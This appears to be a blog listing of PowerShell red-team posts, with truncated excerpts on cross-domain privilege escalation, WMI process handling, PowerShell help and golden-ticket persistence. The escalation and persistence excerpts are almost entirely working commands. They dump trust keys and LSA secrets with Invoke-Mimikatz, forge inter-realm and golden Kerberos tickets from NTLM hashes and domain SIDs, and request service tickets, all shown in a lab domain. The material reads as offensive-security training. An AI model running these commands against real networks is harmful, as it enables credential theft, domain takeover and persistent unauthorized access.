Powershell * RED TEAM SECURITY

Privilege Escalation Across Trust

Priv esc across domains : trust tickets: PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command ‘”lsadump::trust /patch”‘ An inter-realm TGT can be forged: PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command ‘”kerberos::golden /domain:security.local /sid:S-1-5-21-1200125816-2926698244-2119389380-502 /sid:S-1-5-21-1200125816-2926698244-2119389380-502 /rc4:62e72bcfbac429fa51d15ec57caa506d /user:administrator /service:krbtgt /target:security.local /ticket:ticket.kirbi”‘ Gets a TGT for a service (CIFS below) in the target domain by using the forged trust ticket. PS C:\Users\victim6\Downloads\Ghostpack-CompiledBinaries-master\Ghostpack-CompiledBinaries-master> asktgs.exe C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration\ticket.kirbi CIFS/WIN-2RUMVG5JPOC.security.local…

Powershell * WMI

Classes Remove an Object

WMI returns live, editable objects so place be careful while removing on object: PS C:\Windows\system32> Get-WmiObject -Class win32_process | where-object {$_.Name -eq “notepad.exe”} | Remove-WmiObject PS C:\Windows\system32> Get-CimInstance -ClassName win32_process -Filter “Name = ‘notepad.exe’” | remove-ciminstance PS C:\Windows\system32> Get-WmiObject -class win32_process -filter ‘Name = “calculator.exe”‘ PS C:\Windows\system32> Get-WmiObject -class win32_process –list Exploring Methods: Find all…

Powershell * RED TEAM SECURITY

Powershell Begineer

Powershell Help system : List everything which contains the word process : PS C:\Users\victim6\Downloads\new\new> get-help *process* PS C:\Users\victim6\Downloads\new\new> get-help about_* PS C:\Users\victim6\Downloads\new\new> $psversiontable PS C:\Users\victim6\Downloads\new\new> get-help Get-Process -Parameter name PS C:\Users\victim6\Downloads\new\new> get-help * Update the help system (v3+) PS C:\Users\victim6\Downloads\new\new> update-help List full help about a topic PS C:\Users\victim6\Downloads\new\new> get-help get-item Lists examples of how…

Powershell * RED TEAM SECURITY

Persistence Flow

Persistence Technique: Golden Ticket: Execute mimikatz on DC: mimikatz # privilege::debug mimikatz # lsadump::lsa /patch -computername WIN-2RUMVG5JPOC PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command ‘”lsadump::lsa /patch”‘ On any machine: PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command ‘”kerberos::golden /user:administrator /domain:security.local /sid:S-1-5-21-2515352101-914078745-3278884511-1001 /krbtgt:30ca30e0cbc0f87b2f5bac01794a2357 /id:500 /groups:513 /ptt”‘ To use the DCSync feature for getting krbtgt hash execute the below command with DA privileges for…